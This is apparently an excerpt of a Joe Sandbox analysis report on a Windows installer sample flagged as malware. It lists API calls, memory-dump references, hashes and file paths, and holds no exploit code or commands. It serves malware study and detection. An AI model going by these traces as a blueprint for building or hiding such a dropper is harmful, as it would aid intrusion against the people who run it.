                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                            • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                            • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                            • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                            Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                              • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                              • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 813e2c64fde129824382462705e950e390d85a8e38cdda59b2bd6b355737961d
                                                                            • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                                            • Opcode Fuzzy Hash: 813e2c64fde129824382462705e950e390d85a8e38cdda59b2bd6b355737961d
                                                                            • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

                                                                            Non-executed Functions

                                                                            Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                                                            • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                            • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                            • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                            • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                            • ShowWindow.USER32(00000000), ref: 0040520D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                                            • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                            • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                                            • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                            Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                                                            • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                                                              • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                                              • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                                              • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                                            • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                                                              • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                                              • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                                                              • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$6B
                                                                            • API String ID: 2624150263-759560206
                                                                            • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                                            • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                                                            • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                                            • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                            Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                            • GetSysColor.USER32(?), ref: 0040445E
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                            • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                            • SendMessageW.USER32(00000000), ref: 00404501
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                                                            • SetCursor.USER32(00000000), ref: 00404580
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                                                            • SetCursor.USER32(00000000), ref: 0040459C
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: : Completed$N
                                                                            • API String ID: 3103080414-2140067464
                                                                            • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                            • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                            • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                            • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                            • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                            • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                            • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                            Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                                                            • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                            • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                                                            • wsprintfA.USER32 ref: 00405F17
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                            • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                            • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                            • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                            Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 004064E0
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6
                                                                            • *?|<>/":, xrefs: 00406532
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2525390294
                                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                            Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                            • GetSysColor.USER32(00000000), ref: 00404281
